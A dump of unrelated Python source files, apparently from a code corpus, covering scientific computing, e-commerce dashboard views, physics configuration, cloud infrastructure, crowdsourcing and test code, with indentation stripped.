plt.axis([-0.1,1.1,-0.5,0.5])
animation=anime.FuncAnimation(fig1,ran_plot,blit=False)
plt.show()
#----------- Data Export -----------------
# # windows test mode----------------------------------
# directory = "C:\\AA_NeuralNetwork_ImagesFolder\\"
# train = "train\\"
# test = "test\\"
# Linux mode --------------------------
# directory = "~/DiplomaThesisData/"
train ="train/"
test ="test/"
DIRS = ""
#Create ROOT Directory
try:
os.mkdir(directory)
print(f"The directory: {directory} has been made.")
except:
print(f"The directory: {directory} already exists.")
try:
os.mkdir(directory+train)
print(f"The directory: {directory+train} has been made.")
except:
print(f"The directory: {directory+train} already exists.")
try:
os.mkdir(directory+test)
print(f"The directory: {directory+test} has been made.")
except:
print(f"The directory: {directory+test} already exists.")
for i in range(samples):
dir =""
if i < int(2*samples/3):
dir = f"{directory+train}#_{i}/"
elif i >= int(2*samples/3):
dir = f"{directory+test}#_{i}/"
try:
os.mkdir(dir)
except:
shutil.rmtree(dir,ignore_errors=True)
os.mkdir(dir)
DIRS += f"{dir}\n"
# lines=""
text=[f"#variant no.{i}\n"]
for j in range(0,len(up_sides[i][0])-1):
# lines += f"{index[j-1]} {up_sides[i][0][j]} {up_sides[i][1][j]}\n"
text.append(f"{up_sides[i][0][j]} {up_sides[i][1][j]}\n")
for j in range(1,len(down_sides[i][0])-1):
# lines += f"{index[j+len(up_sides[i][0])-3]} {down_sides[i][0][j]} {down_sides[i][1][j]}\n"
text.append(f"{down_sides[i][0][j]} {down_sides[i][1][j]}\n")
# lines+="----------- EOF ---------------------"
text.append("----------- EOF ---------------------")
#data export as var.geom file for use with grid manipulation
with open((dir+f"var.geom"),'w') as file:
# file.write(lines)
for line in text:
file.write(line)
#image data export
ig.ImageDatabase(dir,text)
with open("/home/freshstart/DiplomaThesisData/DIRS",'w') as file:
file.write(DIRS)
|
py | 7dfcf82ed2332e403bb3a8f500d8599706e577d3 | from __future__ import print_function, division
import numpy as np
from openmdao.api import ExplicitComponent
try:
from openaerostruct.fortran import OAS_API
fortran_flag = True
data_type = float
except:
fortran_flag = False
data_type = complex
class StructuralCG(ExplicitComponent):
""" Compute center-of-gravity location of the spar elements.
parameters
----------
A[ny-1] : numpy array
Areas for each FEM element.
nodes[ny, 3] : numpy array
Flattened array with coordinates for each FEM node.
Returns
-------
structural_weight : float
Weight of the structural spar.
cg_location[3] : numpy array
Location of the structural spar's cg.
"""
def initialize(self):
self.options.declare('surface', types=dict)
def setup(self):
self.surface = surface = self.options['surface']
self.ny = surface['num_y']
self.add_input('nodes', val=np.zeros((self.ny, 3)), units='m')#, dtype=data_type))
self.add_input('structural_weight', val=0., units='N')
self.add_input('element_weights', val=np.zeros((self.ny-1)), units='N')
self.add_output('cg_location', val=np.zeros((3)), units='m')#, dtype=data_type))
self.declare_partials('*', '*', method='cs')
def compute(self, inputs, outputs):
nodes = inputs['nodes']
structural_weight = inputs['structural_weight']
element_weights = inputs['element_weights']
# Calculate the center-of-gravity location of the spar elements only
center_of_elements = (nodes[1:, :] + nodes[:-1, :]) / 2.
cg_loc = np.sum(center_of_elements.T * element_weights, axis=1) / structural_weight
# If the tube is symmetric, double the computed weight and set the
# y-location of the cg to 0, at the symmetry plane
if self.surface['symmetry']:
cg_loc[1] = 0.
cg_loc *= 2.
outputs['cg_location'] = cg_loc
def compute_partials(self, inputs, partials):
nodes = inputs['nodes']
structural_weight = inputs['structural_weight']
element_weights = inputs['element_weights']
|
py | 7dfcf98b7910219e34eea892a357453b76030859 | import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Run3_dd4hep_cff import Run3_dd4hep
process = cms.Process("TrackerParametersTest", Run3_dd4hep)
process.load('Configuration.Geometry.GeometryDD4hepExtended2021Reco_cff')
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('TrackerParametersAnalyzer')
process.MessageLogger.destinations.append('cout')
process.MessageLogger = cms.Service("MessageLogger",
cerr = cms.untracked.PSet(
enable = cms.untracked.bool(False)
),
cout = cms.untracked.PSet(
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
TrackerParametersAnalyzer = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
enable = cms.untracked.bool(True),
enableStatistics = cms.untracked.bool(True),
noLineBreaks = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO')
),
files = cms.untracked.PSet(
trackerParametersDD4hep = cms.untracked.PSet(
DEBUG = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
ERROR = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
FWKINFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
TrackerParametersAnalyzer = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO')
)
)
)
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.test = cms.EDAnalyzer("TrackerParametersAnalyzer")
process.Timing = cms.Service("Timing")
process.SimpleMemoryCheck = cms.Service("SimpleMemoryCheck")
process.p1 = cms.Path(process.test)
|
py | 7dfcfa278cd1e9da40ca76e54fbe87830ba3dc17 | __author__ = """Jelle Spijker"""
__email__ = '[email protected]'
__version__ = '0.1.0'
from pint import UnitRegistry, set_application_registry
ureg = UnitRegistry(autoconvert_offset_to_baseunit=True, default_as_delta=False)
ureg.setup_matplotlib(True)
Q_ = ureg.Quantity
set_application_registry(ureg)
|
py | 7dfcfb3c9e9bb36308e4f6c810fb68bb6d6349c5 | from __future__ import unicode_literals
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404, redirect
from django.template.response import TemplateResponse
from django.utils.http import is_safe_url
from django.utils.translation import pgettext_lazy
from django.views.decorators.http import require_http_methods
from . import forms
from ...core.utils import get_paginator_items
from ...product.models import (Product, ProductAttribute, ProductClass,
ProductImage, ProductVariant, Stock,
StockLocation)
from ..views import staff_member_required
@staff_member_required
def product_class_list(request):
classes = ProductClass.objects.all().prefetch_related(
'product_attributes', 'variant_attributes')
form = forms.ProductClassForm(request.POST or None)
if form.is_valid():
return redirect('dashboard:product-class-add')
classes = get_paginator_items(classes, 30, request.GET.get('page'))
classes.object_list = [
(pc.pk, pc.name, pc.has_variants, pc.product_attributes.all(),
pc.variant_attributes.all())
for pc in classes.object_list]
ctx = {'form': form, 'product_classes': classes}
return TemplateResponse(request, 'dashboard/product/class_list.html', ctx)
@staff_member_required
def product_class_create(request):
product_class = ProductClass()
form = forms.ProductClassForm(request.POST or None,
instance=product_class)
if form.is_valid():
product_class = form.save()
msg = pgettext_lazy(
'Dashboard message', 'Added product type %s') % product_class
messages.success(request, msg)
return redirect('dashboard:product-class-list')
ctx = {'form': form, 'product_class': product_class}
return TemplateResponse(
request, 'dashboard/product/product_class_form.html', ctx)
@staff_member_required
def product_class_edit(request, pk):
product_class = get_object_or_404(
ProductClass, pk=pk)
form = forms.ProductClassForm(request.POST or None,
instance=product_class)
if form.is_valid():
product_class = form.save()
msg = pgettext_lazy(
'Dashboard message', 'Updated product type %s') % product_class
messages.success(request, msg)
return redirect('dashboard:product-class-update', pk=pk)
ctx = {'form': form, 'product_class': product_class}
return TemplateResponse(
request, 'dashboard/product/product_class_form.html', ctx)
@staff_member_required
def product_class_delete(request, pk):
product_class = get_object_or_404(ProductClass, pk=pk)
products = [str(p) for p in product_class.products.all()]
if request.method == 'POST':
product_class.delete()
messages.success(
request,
pgettext_lazy(
'Dashboard message',
'Deleted product type %s') % product_class)
return redirect('dashboard:product-class-list')
return TemplateResponse(
request,
'dashboard/product/modal_product_class_confirm_delete.html',
{'product_class': product_class, 'products': products})
@staff_member_required
def product_list(request):
products = Product.objects.prefetch_related('images')
product_classes = ProductClass.objects.all()
form = forms.ProductClassSelectorForm(
request.POST or None, product_classes=product_classes)
if form.is_valid():
return redirect('dashboard:product-add',
class_pk=form.cleaned_data['product_cls'])
products = get_paginator_items(products, 30, request.GET.get('page'))
ctx = {'form': form, 'products': products,
'product_classes': product_classes}
return TemplateResponse(request, 'dashboard/product/list.html', ctx)
@staff_member_required
def product_create(request, class_pk):
product_class = get_object_or_404(ProductClass, pk=class_pk)
create_variant = not product_class.has_variants
product = Product()
product.product_class = product_class
product_form = forms.ProductForm(request.POST or None, instance=product)
if create_variant:
variant = ProductVariant(product=product)
variant_form = forms.ProductVariantForm(request.POST or None,
instance=variant,
prefix='variant')
variant_errors = not variant_form.is_valid()
else:
variant_form = None
variant_errors = False
if product_form.is_valid() and not variant_errors:
product = product_form.save()
if create_variant:
variant.product = product
variant_form.save()
msg = pgettext_lazy(
'Dashboard message', 'Added product %s') % product
messages.success(request, msg)
return redirect('dashboard:product-update',
pk=product.pk)
ctx = {'product_form': product_form, 'variant_form': variant_form,
'product': product}
return TemplateResponse(
request, 'dashboard/product/product_form.html', ctx)
@staff_member_required
def product_edit(request, pk):
product = get_object_or_404(
Product.objects.prefetch_related(
'images', 'variants'), pk=pk)
edit_variant = not product.product_class.has_variants
attributes = product.product_class.variant_attributes.prefetch_related(
'values')
images = product.images.all()
variants = product.variants.all()
stock_items = Stock.objects.filter(
variant__in=variants).select_related('variant', 'location')
form = forms.ProductForm(request.POST or None, instance=product)
variants_delete_form = forms.VariantBulkDeleteForm()
stock_delete_form = forms.StockBulkDeleteForm()
if edit_variant:
variant = variants.first()
variant_form = forms.ProductVariantForm(
request.POST or None, instance=variant, prefix='variant')
variant_errors = not variant_form.is_valid()
else:
variant_form = None
variant_errors = False
if form.is_valid() and not variant_errors:
product = form.save()
msg = pgettext_lazy(
'Dashboard message', 'Updated product %s') % product
messages.success(request, msg)
return redirect('dashboard:product-update', pk=product.pk)
ctx = {'attributes': attributes, 'images': images, 'product_form': form,
'product': product, 'stock_delete_form': stock_delete_form,
'stock_items': stock_items, 'variants': variants,
'variants_delete_form': variants_delete_form,
'variant_form': variant_form}
return TemplateResponse(
request, 'dashboard/product/product_form.html', ctx)
@staff_member_required
def product_delete(request, pk):
product = get_object_or_404(Product, pk=pk)
if request.method == 'POST':
product.delete()
messages.success(
request,
pgettext_lazy('Dashboard message', 'Deleted product %s') % product)
return redirect('dashboard:product-list')
return TemplateResponse(
request, 'dashboard/product/modal_product_confirm_delete.html',
{'product': product})
@staff_member_required
def stock_edit(request, product_pk, stock_pk=None):
product = get_object_or_404(Product, pk=product_pk)
if stock_pk:
stock = get_object_or_404(Stock, pk=stock_pk)
else:
stock = Stock()
form = forms.StockForm(request.POST or None, instance=stock,
product=product)
if form.is_valid():
form.save()
messages.success(
request, pgettext_lazy('Dashboard message', 'Saved stock'))
product_url = reverse(
'dashboard:product-update', kwargs={'pk': product_pk})
success_url = request.POST.get('success_url', product_url)
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'form': form, 'product': product, 'stock': stock}
return TemplateResponse(request, 'dashboard/product/stock_form.html', ctx)
@staff_member_required
def stock_delete(request, product_pk, stock_pk):
product = get_object_or_404(Product, pk=product_pk)
stock = get_object_or_404(Stock, pk=stock_pk)
if request.method == 'POST':
stock.delete()
messages.success(
request, pgettext_lazy('Dashboard message', 'Deleted stock'))
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'product': product, 'stock': stock}
return TemplateResponse(
request, 'dashboard/product/stock_confirm_delete.html', ctx)
@staff_member_required
@require_http_methods(['POST'])
def stock_bulk_delete(request, product_pk):
product = get_object_or_404(Product, pk=product_pk)
form = forms.StockBulkDeleteForm(request.POST)
if form.is_valid():
form.delete()
success_url = request.POST['success_url']
messages.success(
request, pgettext_lazy('Dashboard message', 'Deleted stock'))
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
return redirect('dashboard:product-update', pk=product.pk)
@staff_member_required
def product_image_edit(request, product_pk, img_pk=None):
product = get_object_or_404(Product, pk=product_pk)
if img_pk:
product_image = get_object_or_404(product.images, pk=img_pk)
else:
product_image = ProductImage(product=product)
show_variants = product.product_class.has_variants
form = forms.ProductImageForm(request.POST or None, request.FILES or None,
instance=product_image)
if form.is_valid():
product_image = form.save()
if img_pk:
msg = pgettext_lazy(
'Dashboard message',
'Updated image %s') % product_image.image.name
else:
msg = pgettext_lazy(
'Dashboard message',
'Added image %s') % product_image.image.name
messages.success(request, msg)
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'form': form, 'product': product, 'product_image': product_image,
'show_variants': show_variants}
return TemplateResponse(
request, 'dashboard/product/product_image_form.html', ctx)
@staff_member_required
def product_image_delete(request, product_pk, img_pk):
product = get_object_or_404(Product, pk=product_pk)
product_image = get_object_or_404(product.images, pk=img_pk)
if request.method == 'POST':
product_image.delete()
messages.success(
request,
pgettext_lazy(
'Dashboard message',
'Deleted image %s') % product_image.image.name)
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'product': product, 'product_image': product_image}
return TemplateResponse(
request,
'dashboard/product/modal_product_image_confirm_delete.html', ctx)
@staff_member_required
def variant_edit(request, product_pk, variant_pk=None):
product = get_object_or_404(Product.objects.all(),
pk=product_pk)
form_initial = {}
if variant_pk:
variant = get_object_or_404(product.variants.all(),
pk=variant_pk)
else:
variant = ProductVariant(product=product)
form = forms.ProductVariantForm(request.POST or None, instance=variant,
initial=form_initial)
attribute_form = forms.VariantAttributeForm(request.POST or None,
instance=variant)
if all([form.is_valid(), attribute_form.is_valid()]):
form.save()
attribute_form.save()
if variant_pk:
msg = pgettext_lazy(
'Dashboard message',
'Updated variant %s') % variant.name
else:
msg = pgettext_lazy(
'Dashboard message',
'Added variant %s') % variant.name
messages.success(request, msg)
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'attribute_form': attribute_form, 'form': form, 'product': product,
'variant': variant}
return TemplateResponse(
request, 'dashboard/product/variant_form.html', ctx)
@staff_member_required
def variant_delete(request, product_pk, variant_pk):
product = get_object_or_404(Product, pk=product_pk)
variant = get_object_or_404(product.variants, pk=variant_pk)
is_only_variant = product.variants.count() == 1
if request.method == 'POST':
variant.delete()
messages.success(
request,
pgettext_lazy(
'Dashboard message', 'Deleted variant %s') % variant.name)
success_url = request.POST['success_url']
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
ctx = {'is_only_variant': is_only_variant, 'product': product,
'variant': variant}
return TemplateResponse(
request,
'dashboard/product/modal_product_variant_confirm_delete.html', ctx)
@staff_member_required
@require_http_methods(['POST'])
def variants_bulk_delete(request, product_pk):
product = get_object_or_404(Product, pk=product_pk)
form = forms.VariantBulkDeleteForm(request.POST)
if form.is_valid():
form.delete()
success_url = request.POST['success_url']
messages.success(
request,
pgettext_lazy('Dashboard message', 'Deleted variants'))
if is_safe_url(success_url, allowed_hosts=request.get_host()):
return redirect(success_url)
return redirect('dashboard:product-update', pk=product.pk)
@staff_member_required
def attribute_list(request):
attributes = [
(attribute.pk, attribute.name, attribute.values.all())
for attribute in ProductAttribute.objects.prefetch_related('values')]
ctx = {'attributes': attributes}
return TemplateResponse(request, 'dashboard/product/attributes/list.html',
ctx)
@staff_member_required
def attribute_edit(request, pk=None):
if pk:
attribute = get_object_or_404(ProductAttribute, pk=pk)
else:
attribute = ProductAttribute()
form = forms.ProductAttributeForm(request.POST or None, instance=attribute)
formset = forms.AttributeChoiceValueFormset(request.POST or None,
request.FILES or None,
instance=attribute)
if all([form.is_valid(), formset.is_valid()]):
attribute = form.save()
formset.save()
msg = pgettext_lazy(
'Dashboard message', 'Updated attribute') if pk else pgettext_lazy(
'Dashboard message', 'Added attribute')
messages.success(request, msg)
return redirect('dashboard:product-attribute-update', pk=attribute.pk)
ctx = {'attribute': attribute, 'form': form, 'formset': formset}
return TemplateResponse(request, 'dashboard/product/attributes/form.html',
ctx)
@staff_member_required
def attribute_delete(request, pk):
attribute = get_object_or_404(ProductAttribute, pk=pk)
if request.method == 'POST':
attribute.delete()
messages.success(
request,
pgettext_lazy(
'Dashboard message',
'Deleted attribute %s') % (attribute.name,))
return redirect('dashboard:product-attributes')
ctx = {'attribute': attribute}
return TemplateResponse(
request, 'dashboard/product/attributes/modal_confirm_delete.html', ctx)
@staff_member_required
def stock_location_list(request):
stock_locations = StockLocation.objects.all()
ctx = {'locations': stock_locations}
return TemplateResponse(
request, 'dashboard/product/stock_locations/list.html', ctx)
@staff_member_required
def stock_location_edit(request, location_pk=None):
if location_pk:
location = get_object_or_404(StockLocation, pk=location_pk)
else:
location = StockLocation()
form = forms.StockLocationForm(request.POST or None, instance=location)
if form.is_valid():
form.save()
msg = pgettext_lazy(
'Dashboard message for stock location',
'Updated location') if location_pk else pgettext_lazy(
'Dashboard message for stock location', 'Added location')
messages.success(request, msg)
return redirect('dashboard:product-stock-location-list')
ctx = {'form': form, 'location': location}
return TemplateResponse(
request, 'dashboard/product/stock_locations/form.html', ctx)
@staff_member_required
def stock_location_delete(request, location_pk):
location = get_object_or_404(StockLocation, pk=location_pk)
stock_count = location.stock_set.count()
if request.method == 'POST':
location.delete()
messages.success(
request, pgettext_lazy(
'Dashboard message for stock location',
'Deleted location %s') % location)
return redirect('dashboard:product-stock-location-list')
ctx = {'location': location, 'stock_count': stock_count}
return TemplateResponse(
request, 'dashboard/product/stock_locations/modal_confirm_delete.html',
ctx)
|
py | 7dfcfb4d8e253672d9648a2069771d316266098b | """
Remove Nth Node From End of List
Given a linked list, remove the n-th node from the end of list and return its head.
Example:
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
Follow up:
Could you do this in one pass?
"""
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
# init, use dummmy to handle the case: remove first node
dummy = ListNode(-1)
dummy.next = head
slow, fast = dummy, dummy
while n > 0 and fast.next:
n -= 1
fast = fast.next
if n > 0:
return dummy.next
# slow, fast->end
while fast and fast.next:
slow, fast = slow.next, fast.next
# delete node
slow.next = slow.next.next
return dummy.next |
py | 7dfcfb9d64726a679fe412447d282817d458d403 | import matplotlib
import numpy as np
import matplotlib.pyplot as plt
def polyfit(dates , levels, p):
time_shift=1
date_num=matplotlib.dates.date2num(dates)
y=levels
d0=2
shifted_dates = date_num-date_num[0]
p_coeff=np.polyfit(shifted_dates,y,p)
poly=np.poly1d(p_coeff)
return(poly, time_shift)
|
py | 7dfcfbdabfab6f773ff53ae776dc309d4ff42925 |
import unittest
import functools
import argparse
import os,sys,inspect
import copy
from HDPython.base import *
from HDPython.v_symbol import *
from HDPython.v_entity import *
from HDPython.v_list import *
class clk_generator(v_entity):
def __init__(self):
super().__init__()
self.clk = port_out(v_sl())
self.architecture()
@architecture
def architecture(self):
@timed()
def proc():
self.clk << 1
#print("======================")
yield wait_for(10)
self.clk << 0
yield wait_for(10)
|
py | 7dfcfd0d627e556ac12a03745df817e925291e4e | """
Test compiled module
"""
import os
import jedi
from ..helpers import cwd_at
import pytest
def test_completions(Script):
s = Script('import _ctypes; _ctypes.')
assert len(s.completions()) >= 15
def test_call_signatures_extension(Script):
if os.name == 'nt':
func = 'LoadLibrary'
params = 1
else:
func = 'dlopen'
params = 2
s = Script('import _ctypes; _ctypes.%s(' % (func,))
sigs = s.call_signatures()
assert len(sigs) == 1
assert len(sigs[0].params) == params
def test_call_signatures_stdlib(Script):
s = Script('import math; math.cos(')
sigs = s.call_signatures()
assert len(sigs) == 1
assert len(sigs[0].params) == 1
# Check only on linux 64 bit platform and Python3.4.
@pytest.mark.skipif('sys.platform != "linux" or sys.maxsize <= 2**32 or sys.version_info[:2] != (3, 4)')
@cwd_at('test/test_evaluate')
def test_init_extension_module(Script):
"""
``__init__`` extension modules are also packages and Jedi should understand
that.
Originally coming from #472.
This test was built by the module.c and setup.py combination you can find
in the init_extension_module folder. You can easily build the
`__init__.cpython-34m.so` by compiling it (create a virtualenv and run
`setup.py install`.
This is also why this test only runs on certain systems (and Python 3.4).
"""
s = jedi.Script('import init_extension_module as i\ni.', path='not_existing.py')
assert 'foo' in [c.name for c in s.completions()]
s = jedi.Script('from init_extension_module import foo\nfoo', path='not_existing.py')
assert ['foo'] == [c.name for c in s.completions()]
|
py | 7dfcfd9d0ceea8562bb42d422e6ac153f4b846c5 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['Disk']
class Disk(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_type: Optional[pulumi.Input['StorageAccountTypes']] = None,
creation_data: Optional[pulumi.Input[pulumi.InputType['CreationDataArgs']]] = None,
disk_name: Optional[pulumi.Input[str]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
encryption_settings: Optional[pulumi.Input[pulumi.InputType['EncryptionSettingsArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
os_type: Optional[pulumi.Input['OperatingSystemTypes']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Disk resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input['StorageAccountTypes'] account_type: the storage account type of the disk.
:param pulumi.Input[pulumi.InputType['CreationDataArgs']] creation_data: Disk source information. CreationData information cannot be changed after the disk has been created.
:param pulumi.Input[str] disk_name: The name of the managed disk that is being created. The name can't be changed after the disk is created. Supported characters for the name are a-z, A-Z, 0-9 and _. The maximum name length is 80 characters.
:param pulumi.Input[int] disk_size_gb: If creationData.createOption is Empty, this field is mandatory and it indicates the size of the VHD to create. If this field is present for updates or creation with other options, it indicates a resize. Resizes are only allowed if the disk is not attached to a running VM, and can only increase the disk's size.
:param pulumi.Input[pulumi.InputType['EncryptionSettingsArgs']] encryption_settings: Encryption settings for disk or snapshot
:param pulumi.Input[str] location: Resource location
:param pulumi.Input['OperatingSystemTypes'] os_type: The Operating System type.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['account_type'] = account_type
if creation_data is None and not opts.urn:
raise TypeError("Missing required property 'creation_data'")
__props__['creation_data'] = creation_data
__props__['disk_name'] = disk_name
__props__['disk_size_gb'] = disk_size_gb
__props__['encryption_settings'] = encryption_settings
__props__['location'] = location
__props__['os_type'] = os_type
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['name'] = None
__props__['owner_id'] = None
__props__['provisioning_state'] = None
__props__['time_created'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/v20160430preview:Disk"), pulumi.Alias(type_="azure-native:compute:Disk"), pulumi.Alias(type_="azure-nextgen:compute:Disk"), pulumi.Alias(type_="azure-native:compute/latest:Disk"), pulumi.Alias(type_="azure-nextgen:compute/latest:Disk"), pulumi.Alias(type_="azure-native:compute/v20170330:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20170330:Disk"), pulumi.Alias(type_="azure-native:compute/v20180401:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180401:Disk"), pulumi.Alias(type_="azure-native:compute/v20180601:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180601:Disk"), pulumi.Alias(type_="azure-native:compute/v20180930:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180930:Disk"), pulumi.Alias(type_="azure-native:compute/v20190301:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:Disk"), pulumi.Alias(type_="azure-native:compute/v20190701:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:Disk"), pulumi.Alias(type_="azure-native:compute/v20191101:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20191101:Disk"), pulumi.Alias(type_="azure-native:compute/v20200501:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200501:Disk"), pulumi.Alias(type_="azure-native:compute/v20200630:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200630:Disk"), pulumi.Alias(type_="azure-native:compute/v20200930:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:Disk")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Disk, __self__).__init__(
'azure-native:compute/v20160430preview:Disk',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Disk':
"""
Get an existing Disk resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["account_type"] = None
__props__["creation_data"] = None
__props__["disk_size_gb"] = None
__props__["encryption_settings"] = None
__props__["location"] = None
__props__["name"] = None
__props__["os_type"] = None
__props__["owner_id"] = None
__props__["provisioning_state"] = None
__props__["tags"] = None
__props__["time_created"] = None
__props__["type"] = None
return Disk(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountType")
def account_type(self) -> pulumi.Output[Optional[str]]:
"""
the storage account type of the disk.
"""
return pulumi.get(self, "account_type")
@property
@pulumi.getter(name="creationData")
def creation_data(self) -> pulumi.Output['outputs.CreationDataResponse']:
"""
Disk source information. CreationData information cannot be changed after the disk has been created.
"""
return pulumi.get(self, "creation_data")
@property
@pulumi.getter(name="diskSizeGB")
def disk_size_gb(self) -> pulumi.Output[Optional[int]]:
"""
If creationData.createOption is Empty, this field is mandatory and it indicates the size of the VHD to create. If this field is present for updates or creation with other options, it indicates a resize. Resizes are only allowed if the disk is not attached to a running VM, and can only increase the disk's size.
"""
return pulumi.get(self, "disk_size_gb")
@property
@pulumi.getter(name="encryptionSettings")
def encryption_settings(self) -> pulumi.Output[Optional['outputs.EncryptionSettingsResponse']]:
"""
Encryption settings for disk or snapshot
"""
return pulumi.get(self, "encryption_settings")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="osType")
def os_type(self) -> pulumi.Output[Optional[str]]:
"""
The Operating System type.
"""
return pulumi.get(self, "os_type")
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> pulumi.Output[str]:
"""
A relative URI containing the VM id that has the disk attached.
"""
return pulumi.get(self, "owner_id")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The disk provisioning state.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The time when the disk was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
py | 7dfcfdaa15a0cfc55ba332be6607f08a05e1702e | import argparse
import simpleamt
if __name__ == "__main__":
parser = argparse.ArgumentParser(
parents=[simpleamt.get_parent_parser()], description="Delete HITs"
)
parser.add_argument("--worker_ids_file")
args = parser.parse_args()
mtc = simpleamt.get_mturk_connection_from_args(args)
worker_ids = []
with open(args.worker_ids_file, "r") as f:
worker_ids = [line.strip() for line in f]
print(
"This will block %d workers with IDs with sandbox=%s"
% (len(worker_ids), str(args.sandbox))
)
print("Continue?")
s = input("(y/N): ")
if s.strip().lower() == "y":
for worker_id in worker_ids:
try:
mtc.create_worker_block(
WorkerI=worker_id, Reason="provided bad data"
)
except Exception as e:
print("Failed to block: %s" % (worker_id))
print(e)
else:
print("Aborting")
|
py | 7dfcfde723fbb6d636d1916564e9e2bf4a1a56dc | #!/usr/bin/env python
# Copyright 2020 Jian Wu
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import pytest
import torch as th
from aps.libs import aps_sse_nnet
from aps.transform import EnhTransform
num_bins = 257
log_cmvn_transform = EnhTransform(feats="spectrogram-log-cmvn",
frame_len=512,
frame_hop=256,
center=True)
